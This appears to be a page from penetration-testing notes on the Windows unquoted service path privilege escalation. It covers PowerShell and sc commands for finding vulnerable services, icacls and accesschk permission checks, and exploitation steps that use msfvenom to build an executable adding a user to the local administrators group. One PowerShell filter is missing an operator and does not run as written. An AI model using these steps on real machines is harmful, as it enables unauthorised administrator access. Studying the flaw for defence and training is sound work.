Unquoted Service Path Vulnerability

Overview

This is a common privilege escalation vulnerability in Windows services caused by improper handling of file paths that include spaces. When a service executable's path is not wrapped in quotation marks, Windows may misinterpret the command and attempt to execute a different file earlier in the directory hierarchy

Scenario

if the path to a service binary is :

C:\Program Files\My App\bin\service.exe

And it is not enclosed in quotes, windows will try to execute in the following order

  1. C:\Program.exe

  2. C:\Program Files\My.exe

  3. C:\Program Files\My App\bin\service.exe

if an attackercan drop a milicious binary at any of these higher-precedence pah and has write access, it may executed instead of the intended service binary

Detection

To find all services with potentially vulnerable paths, use the following commands

List all services with path, name and start mode

Get-WmiObject Win32_Service | Select-Object Name, DisplayName, PathName, StartMode

Filter for auto-start services

Get-WmiObject Win32_Service | Where-Object {$_.StartMode -eq "Auto"} | Select-Object Name, DisplayName, PathName

Filter out services in Windows Directory

Get-WmiObject Win32_Service | Where-Object {
    $_.StartMode -eq "Auto" -and
    $_.PathName -notmatch "C:\\Windows"
} | Select-Object Name, DisplayName, PathName

Refine: exclude quoted paths and windows directory

Get-WmiObject Win32_Service | Where-Object {
    $_.StartMode -eq "Auto" -and
    $_.PathName -notmatch "C:\\Windows"
    $_.PathName -notmatch '^"'
} | Select-Object Name, DisplayName, PathName

Detection (CMD Alternative)

List all services with binary paths using sc

for /f "tokens=2 delims=:" %s in ('sc query state^= all ^| findstr /i "SERVICE_NAME"') do @sc qc %s | findstr /i "SERVICE_NAME BINARY_PATH_NAME"

Filter for auto-start services and extract binary paths(verbose)

for /f "tokens=2 delims=:" %s in ('sc query state^= all ^| findstr /i "SERVICE_NAME"') do @sc qc %s | findstr /i "SERVICE_NAME BINARY_PATH_NAME" | findstr /v /i "C:\Windows"

Check one specific service(example)

sc qc "AbyssWebServer"

Permissions

using icacls to check the permissions

icacls "C:\Program Files\NETFATE\Registry Cleaner\RegistryCleanerSrv.exe"
icacls "C:\Program FIles\NETGATE"

Using Sysinternals accesschk64 to check write, vulnerable and user access

accesschk64.exe -wvu "C:\Program Files\NETGATE"

Exploitaion Steps

1. Query the service

sc query <service_name>

2. Stop the service

sc stop <service_name>

3. Confirm it's stopped

sc query <service_name>

4. Create Maicious payload using msfvenom

msfvenom -p windows/exec CMD="net localgroup administrators u1 /add" -f exe > Registry.exe

5. Drop the malicious .exe in writable path

C:\Program Files\NETGATE\Registry.exe

6. Restart the service

sc start <service_name>
PreviousInsecure File Permission - Service Executable Files PathNextEscalation Path via Windows Subsystem for linux(WSL)

Last updated